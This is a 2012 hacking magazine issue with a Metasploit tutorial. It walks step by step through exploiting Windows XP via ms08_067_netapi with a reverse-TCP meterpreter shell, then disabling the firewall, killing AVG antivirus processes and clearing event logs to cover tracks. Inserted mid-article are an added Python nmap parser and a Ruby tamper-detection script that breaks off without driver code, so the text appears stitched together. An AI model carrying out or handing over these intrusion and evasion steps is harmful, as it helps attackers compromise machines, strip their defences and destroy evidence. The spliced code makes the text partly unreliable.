Exploitmag 01 2012
EDITOR'S NOTE
Dear All,
If you are reading this, I presume that you trusted us and reached for the Exploitmag. Thank you for that. As you may see, we launched an entirely new project that targets all types of exploits, hence the name. This month, we host Abhinav Das and Sudhanshu Chauhan, who will expatiate on Metasploit. I genuinely hope that you will like our content and spread the word about us, so we can write for the wider public. In the near future, you can expect issues on: DoS Attacks, Security flaws in WSDL, SOAP. The hidden catch is that those issues will also be free. Do not hesitate and subscribe to our magazine. In case you have any questions, suggestions or doubts, please reach me at: [email protected] for more details.
Kindest Regards
Team
Editor in Chief: Grzegorz Tabaka [email protected]
Managing Editor: Michał Wiśniewski [email protected]
Editorial Advisory Board: Rebecca Wynn, Matt Jonkman, Donald Iverson, Michael Munt, Gary S. Milefsky, Julian Evans, Aby Rao
Proofreaders: Michael Munt, Rebecca Wynn, Elliott Bujan, Bob Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson, Robert Wood
Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeffrey Smith, Robert Wood, Nana Onumah, Rissone Ruggero, Inaki Rodriguez
Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be The Exploit Magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic [email protected]
Production Director: Andrzej Kuca [email protected]
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski [email protected]
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them. To create graphs and diagrams we used program by
DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
METASPLOIT
Have you ever wondered, have you ever given it a thought that your IP (Internet Protocol) address is a very important identification of your computer and that could actually put you, your sensitive data and your computer at risk to attack?
Did you know, or even dream, that somebody can gain Administrator-level access on your computer through the Internet with just your IP address? Did you know that just because you didn't update your Flash version the last time it prompted you to, you made your computer vulnerable to attack and exploitation? Just because you clicked the 'Remind me later' button the last time Flash Player asked you to update it, you put your computer at risk of being hacked? Yes, it is possible. And with the current level of technology and certain neat tools, it is very easy as well. Anybody who reads, understands and tries out what is in this issue of Hakin9 can do it. They can own somebody's Windows XP box remotely by running an exploit on it through the Internet. After that, the rest is in their hands, depending on what kind of damage they wish to do. They may decide to wipe out your operating system, they might decide to print tons of smileys on important office work, or they might set up a keylogger/RAT (Remote Administration Tool) which records your keystrokes and sends them to a remote FTP server. Yes, this is very much possible, and hence it becomes very important to know how to conduct such an attack, so as to have a chance of blocking it.
During my visits to various colleges and institutions to deliver my seminars and workshops, I get bombarded by lots of questions. Amongst these is one which any penetration tester/ethical hacker should know the answer to: how many stages or phases does a pentest have? This question obviously can have multiple answers based on who the pentester is, what his objectives are and other criteria. But most of my hacker pals and I agree that there are 5 stages/phases for a successful and good hack. They are:
1. Reconnaissance
2. Scanning
3. Gaining access (Exploitation)
4. Maintaining access
5. Covering tracks
Of the above-mentioned stages, this issue of Hakin9 will concentrate on the third stage of a successful hack/penetration test: Exploitation. Exploitation is the process of manipulating the behaviour of software or applications to make them behave in an unpredictable fashion which was not intended by the developers. Exploitation is usually done through bugs/glitches/vulnerabilities in software or applications. Hackers who are specialized in the art of exploit writing and exploit development can find bugs in software and applications and write exploits for existing bugs. These exploits may be used by other hackers to gain various privileges on a remote target machine (Figure 1).
The Metasploit Framework, referred to as msf in later parts of this issue, is a part of the Metasploit Project. The Metasploit Framework, in all its simplicity, is a framework consisting of a large number of community-written exploits which are updated from time to time. Metasploit provides an easy-to-use, easy-to-maintain, easy-to-code exploit development environment. It is so simple to use that it is a must-have for newbie hackers. Metasploit also currently has a GUI which makes using it all the more simple. Metasploit was originally written in Perl, but has been completely rewritten in Ruby. It was created by HD Moore, and was sold to the security company Rapid7 in 2009. In 2011, Rapid7 introduced and released a free community version of the product, Metasploit Community Edition, which is a free web-based interface for Metasploit. There are other editions of the Metasploit Framework: Metasploit Express and Metasploit Pro. Metasploit Pro is the best amongst these. However, it is commercial, and the free version is a 7-day trial. If you are in the field of computer/network security, there must have been a point in time when you heard of, or even used, the Metasploit Framework.
It is a must-have for most penetration testers, as it makes our jobs easier. For those of you that have just heard about the Metasploit Framework but didn't find it very useful, I'll be talking about it in the next few pages and drawing up many of its uses, which will amaze you (for sure) and get you more interested in computer security. The Metasploit Framework comes in many different forms, but the most widely used are the msfconsole and Armitage (its graphical interface). For those that are not very comfortable with the CLI, Metasploit now ships with a new GUI, Armitage. Armitage does one thing for sure: it makes the job of penetration testing very easy by adding a GUI to the Metasploit Framework. The ability to combine any exploit with any payload, giving an environment which is extremely flexible and easy to use, is one of the best features of Metasploit. The great thing about Metasploit, which makes it different from a lot of other amazing tools, is that it can run on almost any platform. It runs on all versions of Unix (including Linux and Mac OS X). Apart from *nix environments, Metasploit also runs on Windows! Before going into the first example use and demo of the Metasploit Framework and its usage, I would like to talk about three things which have to be clear to every aspiring hacker and penetration tester.
What is a Vulnerability?
Vulnerabilities are side-effects which result from programming flaws, design flaws or implementation flaws. Most common are vulnerabilities that are created due to programming flaws. Vulnerabilities are weaknesses which are caused by any or many of the mentioned reasons. Vulnerabilities leave a system open to exploitation by hackers. They are loopholes that give an attacker access into your computer.
What is an Exploit?
An exploit is a sequence of commands/code which takes advantage of a vulnerability to cause unexpected behaviour, which was not planned by the person that designed and coded the software/system. This is, obviously, the definition of exploit as a noun, not a verb. The verb form of exploit would mean putting an exploit into action and actually exploiting the system.
What is a Payload?
Simply defined, a payload is the part of malicious code or an exploit that actually performs a destructive operation, and takes advantage of a vulnerability.
After understanding these terms, it might be useful to give you the basic steps of exploiting using the Metasploit Framework, just to demonstrate that it is really easy to use Metasploit. Metasploit is as close as it comes to having a point, click and exploit interface:
1. Choose and configure an exploit.
2. Check if the target is vulnerable/susceptible to the chosen exploit.
3. Choose and configure a payload.
4. Execute the payload.
Note: Optionally, some people perform a step between 3 and 4, which can be called 3.5, which is to encode the payload so that an IPS (Intrusion Prevention System)/IDS (Intrusion Detection System) will not be able to catch the payload.
Now, let's get to the interesting part. Whenever you try to learn a foreign language, you learn it by starting to speak it, starting to use it. The same applies to the technology world and technology-related things and subjects. You have to start using them, applying them in real-life scenarios, to actually become good with them. Hence, at this stage of the tutorial, I would like to walk you through an actual exploitation, so you know how to run and use Metasploit. I usually suggest people use Linux while trying to hack; the environment is amazing and makes everything very easy to do. The current demo will be on a Linux environment. If you don't already know Linux, don't panic! Just do everything step-by-step, as written, and you'll be fine. A lot of people wonder what OS to use, what OS to start off with. There are many free Linux distributions available for immediate download as ISOs. The great thing about ISOs is that you can either use them in a virtual machine, or you can burn them onto a DVD, making a Live-DVD, or you can use a tool like Unetbootin to make a bootable pendrive with that ISO. The currently most preferred Linux distribution used for penetration testing is BackTrack 5. BackTrack 5 is a Linux distribution based on the Debian GNU distro. It is used for digital forensics and penetration testing mainly because of the numerous tools that it has, all pre-installed and pre-set-up, ready to use. You may not use all of the tools on BackTrack 5, but you sure will use some. I personally suggest getting BackTrack 5 due to its ease of use. It also has the Metasploit Framework pre-installed. The latest version of BackTrack, BackTrack 5, comes in many flavours. It can be downloaded from http://www.backtrack-linux.org/downloads/. Now, there are two options with the BackTrack 5 GNOME 32-bit version. You can choose to download it as an ISO or as a VMWare Image. Downloading it as an ISO will give you multiple usages, as I have mentioned above. But if you're planning on using BackTrack 5 as a Virtual Machine, running over your existing OS, I suggest downloading the VMWare Image. This image has VMWare Tools pre-installed, hence easing up the installation process for you. Now, you can use VMWare Player or VMWare Workstation to run BackTrack 5. I personally prefer and suggest VMWare Workstation. It is an amazing piece of software, very nice, very clean, extremely easy to use. So, let me jot down the steps to download and run BackTrack 5:
1. Download the BackTrack 5 ISO/VMWare Image from http://www.backtrack-linux.org/downloads/.
2. Download Unetbootin, if you want to create a bootable USB stick.
3. Download VMWare Player/VMWare Workstation if you want to run BackTrack 5 as a Virtual Machine.
4. If you want to create a Live USB install, follow the steps mentioned here: http://www.backtracklinux.org/tutorials/usb-live-install/.
5. If you want to use the VMWare Image, just extract the contents of the file that you downloaded to any directory. You will find a .vmx file. Double-click it; it should open in the virtualization software that you downloaded.
6. Run the Virtual Machine/reboot into the Live USB.
Congratulations, your attacker system is ready.
Note: Running a Live USB has a disadvantage, which is that you would now require another computer on the local network running the target box specifications. If you use virtualization software like VMWare Workstation, then you can have the target OS running as another virtual machine inside VMWare Workstation, and both attacker and target operating systems will be on top of your host operating system. I prefer it that way, but you can do what you feel comfortable doing.
Figure 3. Logging into the Graphical Interface using the startx command
If you have set up everything as instructed, you will have booted into BackTrack 5 either as a Virtual Machine or as a Live USB. Now, you should see a lot of text appearing on a Command Line Interface (CLI) on the screen, to show that BackTrack is booting. Wait for the login prompt, which looks like this: Figure 2. You should see something similar to the above picture. When you are prompted to enter the login details, you should enter root and toor as the username and password respectively. After logging in, you should see something like the screen below. To start X Windows, type startx as shown in Figure 3. After booting into BackTrack 5, you will need to navigate to the Metasploit Framework menu. I'm currently using a BackTrack 5 32-bit GNOME VMWare Image on VMWare Workstation. Here, you need to navigate to Applications > BackTrack > Exploitation Tools > Network Exploitation > Metasploit Framework (Figure 4). Here, you'll have four options: (1) Armitage, (2) msfcli, (3) msfconsole, (4) msfupdate. You can select option (3) msfconsole from the menu. Another way of accessing the Metasploit Framework is by opening up a terminal and typing /pentest/exploits/framework3/msfconsole. Either way, you should see something like this (Figure 5). Now, if you are uncomfortable with using a command line interface, Metasploit now ships with Armitage, a GUI for Metasploit. You can access Armitage through the menus, as I have shown, and select (1) Armitage, or you can start it from the command line. Armitage can be started by opening the terminal and typing /pentest/exploits/framework3/armitage.
Figure 5. msfconsole
Note: You should have an instance of Metasploit already running. If you do, click Connect. If you do not already have Metasploit running, click Start MSF, which starts the Metasploit service and also connects Armitage to it. Once Armitage is up and running, you should have something like this: Figure 6. Good, you're done setting up the attacker machine. Now, it's time to set up the target machine. For the target machine, I would like you to set up Windows XP SP2 to test against. It will be a very interesting and fun exercise if you can set up Windows XP SP2 on your virtualization software. Most people would have a Windows XP CD lying around somewhere; if you don't, you can always download either the ISO or the VMWare Image from torrents and other places. Also, if you can't find the right file to download, a lot of people suggest downloading it from here: http://nvd.nist.gov/fdcc/index.cfm.
Note: If you download it from NIST, you will have to remove all the patches that are installed in the VM. You can extract the contents and run it. The username/password for the image is Renamed_Admin / P@ssw0rd123456. I won't include any screenshots for this process, though. This is something that is easily googleable. And most of you should know how to install Windows XP on your machine, so that shouldn't be much of a problem.
Windows XP Post Install:
1. Turn Windows Firewall off.
2. Turn off Windows Updates.
3. Open Security Center, select Change the way Security Center alerts me, and deselect all.
4. In the Control Panel, go to Tools, then Folder Options. Select the View tab, scroll to the bottom and un-check the box next to Use simple file sharing. Save changes by clicking OK.
Now, some people tend to wonder and often ask me, "Why did we set up Windows XP SP2?" I say, let's start with something easy, just to break the ice. Once you are used to Metasploit and are familiar with the whole process of exploitation using Metasploit, everything else should automatically fall into place and become very easy for you to do. So, let's start the attack. Power up both your BackTrack 5 Virtual Machine and your Windows XP SP2 Virtual Machine and let's get started.
Step 1
Find out the local IP address of the target/victim machine, which is the Windows XP machine. You can do this by going to the Windows XP Virtual Machine, opening up the command prompt and running ipconfig. That should give you something like this: Figure 7.
Step 2
You found the local IP address of your Windows XP machine. What you now have to do is run an nmap scan from your attacker machine, BackTrack 5. To do this, open a terminal and type nmap -v -n <ip_address> (replace <ip_address> with the IP address of your Windows XP machine). So, in this case, I would run nmap -v -n 192.168.0.101. You will find some services running. We already know what services will be running, so we don't need to bother much about the output of that scan. Something that would concern us more is the version of the software running on those ports. For this, we can use the -sV flag on Nmap. So, the scan becomes nmap -sV -n <ip_address>.
Step 3
We already know what vulnerability exists on the Windows XP SP2 machine, so we will go directly to Metasploit and go through the process of running the exploit.
Step 4
We know the exploit to be used. We shall be using the exploit/windows/smb/ms08_067_netapi exploit. We can do this by opening up msfconsole and typing use exploit/windows/smb/ms08_067_netapi. After that, you should get something like this: Figure 8. So, currently, you are using the exploit called ms08_067_netapi, which Windows XP SP2 machines are vulnerable to. Next, you will have to select and set what payload you want to use. There are many payloads available for this exploit.
Figure 8
Step 5
Note: I already know what exploit Windows XP SP2 machines are vulnerable to, hence I directly used the ms08_067_netapi exploit. But in normal, real-life situations it is not so easy. You would need to use a command such as search in the MSF console to find exploits related to the services that the remote target is running. Once you find an exploit, you can use it by following the same steps. I repeat, I know for sure that Win XP SP2 is vulnerable to this exploit, and have thus used it. Do not try attacking an Apache machine with this exploit and ask me "Why isn't it working?" If you are using an Apache box as a target, you can do a search in the MSF console to find exploits that might work on the Apache server. Another important thing is the version numbers of the services that are running on the victim. To find the version numbers on the target box, you will need to run a port scan on it. There are multiple tools to do this; I have demonstrated the use of one such tool, called nmap, earlier in this demonstration. There are various other tools to perform network mapping. You can see which one suits you best, and use that. But nmap is considered the most powerful network mapping tool by industry standards.
We will be using the reverse_tcp payload by issuing the following command: set PAYLOAD windows/meterpreter/reverse_tcp. Now, we get something like this: Figure 9.
Step 6
Now, we have completed setting the payload. You can check the available options by doing show options, like thus: Figure 10.
Step 7
The worst is over! If you found that difficult, knock yourself out with a trout. Now, all that remains for you to do is set the RHOST and LHOST. RHOST is the IP address of the target machine (which we found in Step 1) and LHOST is the IP address of the attacker (you can find that by opening another terminal on your BackTrack machine and running ifconfig). To set RHOST, you just need to type set RHOST <ip_address_of_target>, and to set LHOST, you need to type set LHOST <ip_address_of_attacker>. After that, you should get something like this: Figure 11. Now, the last thing you need to do is type exploit. If you set up everything correctly, and didn't make any mistakes in setting RHOST and LHOST, you should be able to successfully exploit your Windows XP SP2 machine. After a few lines, you should see the meterpreter> prompt. This shows that you've successfully hacked the remote machine and that your payload has successfully run. You can run the ps command to list the processes on the remote victim machine. You can view processes, kill processes, and do whatever you like to the target. I personally prefer doing a shutdown -s -t 0.
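Step 2 above leaves the assessor reading the nmap -sV output by eye to pick out service versions. As an added example, not from the article or from the nmap project, the Python below turns that output into a structured inventory and a short review list, which is the form a vulnerability assessment report actually needs. The scan output is constructed for a hypothetical host at 192.168.0.101, and the policy in triage() is an assumption: it flags open ports nmap could not fingerprint, and banners that identify a Windows XP host, for patch-level verification.

```python
"""Turn `nmap -sV` normal output into a structured inventory and a review list.

Added example; not part of the article or of nmap. The scan output below is
constructed for a hypothetical host and the triage policy is an assumption.
"""
import re
from dataclasses import dataclass

SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 5.51 at 2012-01-15 10:02 CET
Nmap scan report for 192.168.0.101
Host is up (0.00041s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:AA:BB:CC (VMware)
Service Info: OS: Windows

Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
"""


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str  # empty when nmap printed no version column for the port


# One "PORT STATE SERVICE VERSION" row; the version column is optional.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Extract every port row from nmap's normal (human-readable) output."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(int(port), proto, state, service, (version or "").strip()))
    return records


def triage(records):
    """Review list for an assessor. Policy (an assumption, not from the article):
    open ports with no fingerprint need a manual look, and a banner that names
    Windows XP needs its patch level confirmed before anything else."""
    findings = []
    for r in records:
        if r.state != "open":
            continue
        if not r.version:
            findings.append((r.port, "no version fingerprint; identify the service manually"))
        elif "Windows XP" in r.version:
            findings.append((r.port, "Windows XP banner; confirm the host is fully patched"))
    return findings


if __name__ == "__main__":
    recs = parse_nmap(SAMPLE_NMAP_OUTPUT)
    for r in recs:
        print(f"{r.port}/{r.proto} {r.state} {r.service} {r.version!r}")
    for port, reason in triage(recs):
        print(f"review {port}: {reason}")
```

Feed it the saved output of a real scan (nmap -sV -n <ip_address> -oN scan.txt) and extend the policy in triage() with whatever your patch baseline requires; the parser itself only relies on the fixed "PORT STATE SERVICE VERSION" column layout.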
Now that you have some idea of how simple it is to use and run exploits using the Metasploit Framework, and now that you have tasted the simplicity and ease of running exploits, let us go back to the basics of Metasploit. We will discuss finer details of the Framework and talk about its various parts and their functions in a bit more detail.
We will revisit the msfconsole, exploits, payloads and the meterpreter. We will talk about what they are, how they work and obviously, how to use them.
Msfconsole
Undoubtedly, the most popular MSF interface is the msfconsole. It acts as a centralised console and, though it may seem intimidating at first, is the best MSF interface to use. The reason it looks intimidating and scary is the obvious fact that you don't know the commands and don't have a GUI to help you (Figure 12). There are various benefits of the msfconsole:
It allows execution of external commands (yes, you can use external commands!).
It is very stable and contains the most features.
It is a simple and clean way to access features of the Framework, owing to full readline support, command completion and other things.
Launching (can be done in multiple ways):
Navigating to msfconsole through the menu, usually Applications > BackTrack > Exploitation Tools > Network Exploitation > Metasploit Framework.
Opening a terminal and running msfconsole. Msfconsole is also located in /opt/framework3/msf3/ and /pentest/exploits/framework3/.
Note: By running msfconsole -h or msfconsole --help you can get various other options.
Due to the wide array of exploits out there, and the obvious difficulty of memorizing the location of each and every exploit, the Metasploit Framework has been kind enough to introduce tab completion. As you know, in any shell, entering what you know and pressing Tab will present you with a list of options available for you to choose from, and when there is only a single option, it will auto-complete the string. MSF incorporated tab completion into almost all of its commands to help users navigate through it from the CLI. Some examples of tab completion, as taken from the Offensive Security website, are:
use exploit/windows/dce
use *.netapi.*
set LHOST
show
set TARGET
exp
Exploits
All of the exploits which are in the Metasploit Framework fall under two categories, depending on how they work and how they exploit, or rather, whom they exploit. These two classifications are:
Active exploits
Passive exploits
Active Exploits
These exploits attack specific targets or hosts. They attack based on the host that the attacker sets. The RHOST variable tells the MSF whom to attack. The exploit attacks only that particular host, runs until completion and exits.
Note: You can always send an active exploit to the background by passing the -j flag. Thus, after configuring the exploit, doing exploit -j will force the active module to the background. A problem with active exploits is that they stop execution whenever an error is encountered (Figure 13).
This is an example of an active exploit which uses a set of previously gathered user credentials (Figure 14).
Passive Exploits
These exploits wait patiently for a victim to connect. In short, they exploit incoming hosts that connect to the attacker machine. Passive exploits usually focus on clients, including web browsers and FTP clients. They can be used with email exploits to wait for connections and exploit any incoming host. They do not attack a particular target but exploit anybody that makes a connection to the attacking machine (Figure 15). An example taken from the Offensive Security website is the use of the animated cursor vulnerability, which doesn't fire until a victim accesses a malicious website (Figure 16).
Figure 15.
Payloads
As we have already discussed, payloads are code that is executed after an exploit successfully completes. Payloads are an interesting part of exploitation. Exploitation only lasts until you get into a system, but payloads are a part of post-exploitation. Payloads on MSF are of three types:
Singles
Stagers
Stages
Singles: These are stand-alone payloads. They are the simplest to use. They could do anything from creating a new user on the target machine to just opening up the Calculator.
Stagers: These types of payloads are more commonly used, since they give more flexibility after exploitation. Stagers create a network connection between the attacker and the victim machines.
Stages: Stages are parts of a payload that are downloaded by Stager modules. The reason that Stages exist is that Stagers have size constraints. But once a Stager completes its run, it can download any of various Stages with no size limits, such as a Meterpreter, VNC injection, iPhone ipwn shell etc.
Metasploit Meterpreter
Now that you know what exploits and payloads are, and since we have discussed the various types of payloads, it becomes easier to understand what the Metasploit Meterpreter is. It is a payload which uses DLL injection stagers. It communicates over the stager socket and establishes an excellent client-side Ruby API. The Meterpreter is extremely stealthy and low-profile, in a sense. This is mainly because it resides entirely in the target machine's memory and is never written to disk. Meterpreter injects itself into compromised processes running on the target machine, which is another great aspect, since it allows the Meterpreter to infect and migrate to other processes with ease. Apart from all this, the Meterpreter uses encrypted communication by default. The Meterpreter is designed to leave as little information or evidence on the compromised target host as possible. Meterpreter can be extended and new features can be added to it without having to rebuild it completely. Features can be added to the Meterpreter by loading extensions. The process of extending it is very simple and seamless and takes minimal time to complete. Some basic Meterpreter commands are:
Command     Function
help        Shows the available commands and their uses as a help menu.
background  Sends the current meterpreter session to the background and returns you to the msf prompt.
getuid      Retrieves the UID (User ID) that the Meterpreter server is running as on the host.
ls          Lists the files in the cwd (current working directory).
download    Downloads a file from the remote machine.
upload      Uploads a file to the remote machine.
execute     Executes a command on the remote target machine.
shell       Invokes a standalone shell on the target machine.
idletime    Displays the amount of time that the remote user has been idle.
hashdump    Dumps the contents of the SAM file/database.
ps          Displays a list of running processes on the victim's machine.
Now that you have understood the Meterpreter and know some of the basic commands, it is time to see what can be done to a remote target in a real-life scenario. If we get into a system that we want to attack, I doubt we will try to shut it down, or open up an instance of the Calculator application. We would want to do something more.
We have discussed various things; we have gone through the procedure of attacking a remote host using MSF. We have configured the exploit and used it. You have been introduced to various types of exploits and payloads. You have also been told about the Meterpreter, its uses, some simple commands and what it can do. Now we move on to another interesting part of hacking, which is important for all serious hackers and pentesters to know. It is generally called covering your tracks, that is, the ability to hack and work undetected. Firewalls and anti-viruses pose a threat to hackers. Firewalls, if properly configured, can block an attack quite efficiently. Anti-viruses can detect your activities and create hurdles.
So, we have covered exploitation and gaining access to a remote host running the Windows XP SP2 operating system. Now, we shall cover another important part of that attack, which is disabling firewalls and killing anti-viruses. For this demonstration, we will use the Windows Firewall and AVG 2012 as the anti-virus. We left off the last demonstration at the Meterpreter session. You can understand that the exploit was successful and that you are in a Meterpreter session by looking for the meterpreter> prompt (Figure 17). The above image shows that we have successfully exploited the target, and that a Meterpreter session has started. If you recall the simple Meterpreter commands that I have tabulated earlier, you will remember the command shell. It is used to get a shell on the remote system. So let us run the shell command at the Meterpreter prompt. On doing so, we get something like this: Figure 18. Now, we have a remote shell on the victim computer. The next step would obviously be checking if the target system has its Firewall running. Now that we have a shell on the target computer, we can easily verify whether its Firewall is running using the command netsh firewall show opmode. That should give you something like this: Figure 19. On looking at the output of the command, we can easily understand that the firewall is enabled. The next step is a no-brainer. We would like to disable the Firewall. Disabling the firewall is easy from the shell, hence we're not going to exit the shell and return to our Meterpreter session just yet. The command that can be used to disable the firewall is netsh firewall set opmode mode=disable. This command, when run from the shell on the remote host, will disable the Firewall. So, you must run the command (Figure 20). The Ok. at the end of the output tells you that the command you have run has completed successfully. That is a very good sign. Sometimes, you might not have Administrator privileges on the box, and you might need to perform some privilege escalation to get a shell with Administrator rights. But again, the process is the same, and running the above command will surely disable the Windows Firewall. This screenshot, taken on the target machine, shows that the Windows Firewall has been successfully disabled (Figure 21). Great! So, the Firewall has been disabled. That is one guard down for the target machine. Now, we can proceed to disabling and killing the anti-viruses running on the target box. For now, we can exit the remote shell and go back to the Meterpreter session by using the exit command. Luckily, killing anti-viruses isn't as tough to do as it was a long time ago. Meterpreter has a custom script that makes that job very easy. All you have to do is use the command run killav. Killav is the name of the script, which probably is an abbreviation for Kill Anti-Viruses. This automates the process of killing an anti-virus, so run the command, sit back, and wait for it to complete (Figure 22). Now, you'll see a list of processes that have been killed by the killav script. If you look at the output, you'll notice that it killed a process called avgrsx.exe. But did it really kill the anti-virus? You can have a look at the source code of the killav script to understand what it actually does. You will see that the script has a list of process names, which it matches to the processes running on the target machine and kills them. So now comes the big question: was the AVG anti-virus really killed?
For understanding this, we would need to revisit the remote host by opening a shell on it. To do that, run the command shell. Now, to get a list of processes running on the machine, you can run the command tasklist. On running the command, you will get output that looks a lot like this: Figure 23. In the output created by running the tasklist command, you will notice process names starting with avg. So that means the killav script didn't really kill the antivirus. If you want to see what service the processes belong to, you can run tasklist /svc. This gives the same list of processes, with the services that they run. You should get something like this: Figure 24. This is only to categorize the tasklist.

Now, since we are only interested in the avg tasks that are running, we can run the command tasklist /svc | find /I "avg". This tells the target computer to list running processes whose names start with avg. Now, you should get a shorter list that looks like this: Figure 25. Now, after some trial and error, we notice that the avgwd service and the avgidsagent service keep restarting the other processes even if we kill them. This tells us that these are the two main processes and the most suspicious. Anti-virus companies usually tend to start so many processes so as to confuse the attacker on which is the main process that controls the rest. Let us now take a closer look at avgwd and avgidsagent. We can do this by running the command sc queryex <process>, as shown below: Figure 26. If you look at the process description in the output for both of these processes, you will see, written, NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN. That tells us that the processes cannot be stopped or paused. That is a drawback, yes, but it also gives us a hint on what our course of action should be. So now, we will try to disable the processes from auto-starting at reboot, so that they will not start when we reboot the host machine. We can do that by using the command sc config <process> start= disabled (sc requires the space after the equals sign). You should do that for both the processes, avgwd and avgidsagent (Figure 27).
Figure 27. Disabling the main AV processes from auto-starting at boot-time

Now, the next step is debatable, and is not very neat. There are multiple options for us right now: we can reboot the system or wait for the user to reboot the system. Since this is just a tutorial on disabling the firewall and anti-virus, and since it is not a real pentest, I'm going to go ahead with the bad route, which I suggest none of you take: I'll reboot the system. You can do this by giving the command shutdown -r -t 0 or you can exit the shell, come back to your Meterpreter session and use the command reboot. Now, wait for the computer to reboot. After it has, examine the system for any avg processes that are running using the command tasklist /svc | find /I "avg". You should see this: Figure 28.
Figure 28. Main avg processes not running

There are now only three processes running instead of five. The two processes that we disabled are not running, which means we can kill these three processes without any problem. To do that, we can use taskkill /F /IM avg. This command kills running processes whose name has avg in it (Figure 29).
Figure 29. Kill remaining avg processes

Congratulations. You have successfully disabled the Firewall and killed the Anti-virus. Now, you can continue doing whatever you like, without the fear of interruption from either. Note: A lot of hackers like to automate this whole process and write scripts with these commands, scripts that can be run with certain flags. They code them as extensions to Meterpreter. If you are good at coding, you can give that a shot as well.

Another thing that some people like to do, which I always suggest you do after you finish whatever you need to on the target machine, is clearing logs. Again, MSF helps us with this, since it has a built-in script called clearev which clears all the system log files. You can use that by exiting the shell and going back to the Meterpreter session. Run the clearev script (Figure 30). The next screen-shot has been taken on the target machine after running the clearev script (Figure 31).
Figure 30. Using the clearev script
Figure 31. Proof that clearev worked
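Each of the steps above (disabling the firewall with netsh, setting the AV services to start= disabled, clearing the logs with clearev) leaves a trace a defender can check for. The following is an added example, not code from the article or from Metasploit: a Ruby script that parses the output of the same Windows commands (netsh firewall show opmode, sc qc, tasklist /svc) together with a few Windows event records and reports what was tampered with. All sample output and event records are constructed for the example; the event IDs used (7040 for a changed service start type, 517/1102 for a cleared Security log, 104 for a cleared System log) are the standard Windows ones.

```ruby
# Added example, not from the article: defender-side checks over the command output that
# the article's steps produce. All sample output below is constructed; only the command
# formats are real.
AV_SERVICES = %w[avgwd avgidsagent].freeze # the two services the article disables

# Constructed `netsh firewall show opmode` output after the active profile was disabled.
NETSH_OPMODE = <<~OUT.freeze
  Domain profile configuration:
  -------------------------------------------------------------------
  Operational mode                  = Enable
  Exception mode                    = Enable

  Standard profile configuration (current):
  -------------------------------------------------------------------
  Operational mode                  = Disable
  Exception mode                    = Enable
OUT

# Constructed `sc qc <service>` output: one service set to start= disabled, one untouched.
SC_QC_AVGWD = <<~OUT.freeze
  SERVICE_NAME: avgwd
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 4   DISABLED
OUT
SC_QC_AVGIDSAGENT = <<~OUT.freeze
  SERVICE_NAME: avgidsagent
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
OUT
SC_QC = { 'avgwd' => SC_QC_AVGWD, 'avgidsagent' => SC_QC_AVGIDSAGENT }.freeze

# Constructed `tasklist /svc` output after the reboot described in the article.
TASKLIST_SVC = <<~OUT.freeze
  Image Name                     PID Services
  ========================= ======== ============================================
  System Idle Process              0 N/A
  services.exe                   680 Eventlog, PlugPlay
  avgidsagent.exe               1532 avgidsagent
  avgemc.exe                    1600 avgemc
OUT

# Constructed Windows event records. 7040 is written by the Service Control Manager when a
# start type changes; 517 (XP/2003) and 1102 (Vista+) record the Security log being cleared,
# 104 (Vista+) the System log being cleared.
EVENTS = [
  { log: 'System', id: 7040, source: 'Service Control Manager',
    message: 'The start type of the avgwd service was changed from auto start to disabled.' },
  { log: 'Security', id: 517, source: 'Security', message: 'The audit log was cleared' },
  { log: 'System', id: 7036, source: 'Service Control Manager',
    message: 'The Print Spooler service entered the running state.' }
].freeze
LOG_CLEARED_IDS = [517, 1102, 104].freeze

# Names of firewall profiles whose operational mode is Disable.
def disabled_firewall_profiles(netsh_output)
  profile = nil
  netsh_output.each_line.with_object([]) do |line, disabled|
    if (m = line.match(/\A(\w+) profile configuration/))
      profile = m[1]
    elsif profile && line.match?(/\AOperational mode\s*=\s*Disable/i)
      disabled << profile
    end
  end
end

# True when `sc qc` reports START_TYPE as DISABLED.
def start_type_disabled?(sc_qc_output)
  sc_qc_output.match?(/^\s*START_TYPE\s*:\s*\d+\s+DISABLED\b/)
end

# Maps every service name in `tasklist /svc` output to the image hosting it.
def services_from_tasklist(tasklist_output)
  tasklist_output.each_line.with_object({}) do |line, map|
    next if line.strip.empty? || line.start_with?('Image Name', '=')
    m = line.chomp.match(/\A(.+?)\s+(\d+)\s+(.*)\z/)
    next unless m
    m[3].split(/,\s*/).each { |svc| map[svc] = m[1] unless svc == 'N/A' }
  end
end

# Expected AV services that have no running process behind them.
def missing_av_services(tasklist_output, expected = AV_SERVICES)
  running = services_from_tasklist(tasklist_output)
  expected.reject { |svc| running.key?(svc) }
end

# Events that record a cleared log (what clearev leaves behind) or a service start type
# changed to disabled (what `sc config start= disabled` leaves behind).
def tamper_events(events)
  events.select do |e|
    LOG_CLEARED_IDS.include?(e[:id]) || (e[:id] == 7040 && e[:message].match?(/to disabled/i))
  end
end

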